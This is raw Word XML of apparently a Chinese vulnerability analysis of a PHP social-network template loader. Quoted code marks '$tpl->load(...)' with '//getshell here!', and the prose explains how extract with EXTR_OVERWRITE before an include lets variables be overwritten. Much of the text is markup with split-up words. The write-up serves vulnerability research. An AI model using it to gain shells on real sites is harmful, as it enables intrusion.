            <v:rect id="_x0000_s3884" style="position:absolute;left:1067;top:4812;width:361;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3883" style="position:absolute;left:5;top:5075;width:6745;height:506" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3882" style="position:absolute;left:185;top:5138;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s3881" type="#_x0000_t202" style="position:absolute;left:3;top:3;width:6750;height:5581" filled="f" strokecolor="#ccc" strokeweight=".24pt">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                    <w:pPr>
                      <w:rPr>
                        <w:rFonts w:ascii="Times New Roman"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                    </w:pPr>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                    <w:pPr>
                      <w:spacing w:before="6"/>
                      <w:rPr>
                        <w:rFonts w:ascii="Times New Roman"/>
                        <w:sz w:val="29"/>
                      </w:rPr>
                    </w:pPr>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="1" w:line="388" w:lineRule="auto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tshook(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'tpl_compile',array('templateFile',$templateF </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>ile));</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:line="217" w:lineRule="exact"/>
                      <w:ind w:left="9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缓存无效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重新编译</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="112" w:line="391" w:lineRule="auto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tsload(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CORE_LIB_PATH.'/Template.class.php');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tsload(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CORE_LIB_PATH.'/TagLib.class.php');</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                    <w:pPr>
                      <w:spacing w:before="4"/>
                      <w:rPr>
                        <w:rFonts w:ascii="Times New Roman"/>
                        <w:sz w:val="28"/>
                      </w:rPr>
                    </w:pPr>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="1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tsload(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CORE_LIB_PATH.'/TagLib/TagLibCx.class.php');</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:tabs>
                        <w:tab w:val="left" w:pos="1863"/>
                        <w:tab w:val="left" w:pos="2283"/>
                      </w:tabs>
                      <w:spacing w:before="124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$tpl</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:tab/>
                      <w:t>=</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:tab/>
                      <w:t>Template::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getInstance(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65"/>
                      <w:ind w:left="9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编译并加载模板文件</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                    <w:pPr>
                      <w:rPr>
                        <w:rFonts w:ascii="Times New Roman"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                    </w:pPr>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                    <w:pPr>
                      <w:spacing w:before="1"/>
                      <w:rPr>
                        <w:rFonts w:ascii="Times New Roman"/>
                        <w:sz w:val="18"/>
                      </w:rPr>
                    </w:pPr>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:line="391" w:lineRule="auto"/>
                      <w:ind w:left="180" w:right="251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$tpl-&gt;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load(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$templateFile,$tvar,$charset);//getshell </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>here!</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr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5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... ...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3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:spacing w:before="35" w:line="240" w:lineRule="auto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分析下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个函数的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>逻辑</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="11"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:sz w:val="28"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="285" w:lineRule="auto"/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rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>首先判断模板文件是否存在，不存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>则尝试</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>加</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>载</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>默</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>认</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>模板文件，如果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>加</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>载</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>失</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>败</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>就异常退出</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:sz w:val="25"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="285" w:lineRule="auto"/>
        <w:ind w:left="417" w:right="407"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>其次如果模板文件存在，那么</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>该</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>文件是否</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>缓</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>存</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>，如果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>缓</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>存</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>，那么</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>直接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-59"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">include </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>缓存文件，在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-56"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">include </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>前使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-59"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">extract </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>对模板变量赋值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="417" w:right="3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如果模板没有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>缓</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>存，是第一次被</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>调</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>用，那么就</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>编译</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>模板文件并加</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>载</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>它</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="271" w:lineRule="auto"/>
        <w:ind w:left="417" w:right="404"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>在使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>缓</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>存的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>时</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>候程序用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">extract </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>对变量进行赋值，可以看到第二个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>参数，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>EXTR_OVERWIRTE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，表示如果某</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>变</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>量已</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>经</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>存在，那么就覆盖</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>这</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>变</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>量。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:sz w:val="26"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>下面</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>看看非</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>缓</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>存情况下的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>处</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>理：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21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4"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:sz w:val="29"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="35"/>
        <w:ind w:left="417"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:pict>
          <v:group id="_x0000_s3784" style="position:absolute;left:0;text-align:left;margin-left:80.6pt;margin-top:18.35pt;width:337.75pt;height:197.8pt;z-index:7864;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page" coordorigin="1612,367" coordsize="6755,3956">
            <v:rect id="_x0000_s3879" style="position:absolute;left:1617;top:372;width:6745;height:506" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3878" style="position:absolute;left:1797;top:585;width:241;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3877" style="position:absolute;left:2038;top:585;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3876" style="position:absolute;left:2138;top:585;width:800;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3875" style="position:absolute;left:1617;top:878;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s3874" type="#_x0000_t75" style="position:absolute;left:1797;top:941;width:400;height:200">
              <v:imagedata r:id="rId37" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s3873" style="position:absolute;left:2197;top:941;width:723;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3872" style="position:absolute;left:2920;top:941;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3871" style="position:absolute;left:3040;top:941;width:964;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3870" style="position:absolute;left:4004;top:941;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3869" style="position:absolute;left:1617;top:1204;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3868" style="position:absolute;left:1797;top:1267;width:4940;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3867" style="position:absolute;left:6737;top:1267;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3866" style="position:absolute;left:6858;top:1267;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3865" style="position:absolute;left:1617;top:1530;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3864" style="position:absolute;left:1797;top:1593;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3863" style="position:absolute;left:1897;top:1593;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3862" style="position:absolute;left:1997;top:1593;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3861" style="position:absolute;left:2097;top:1593;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
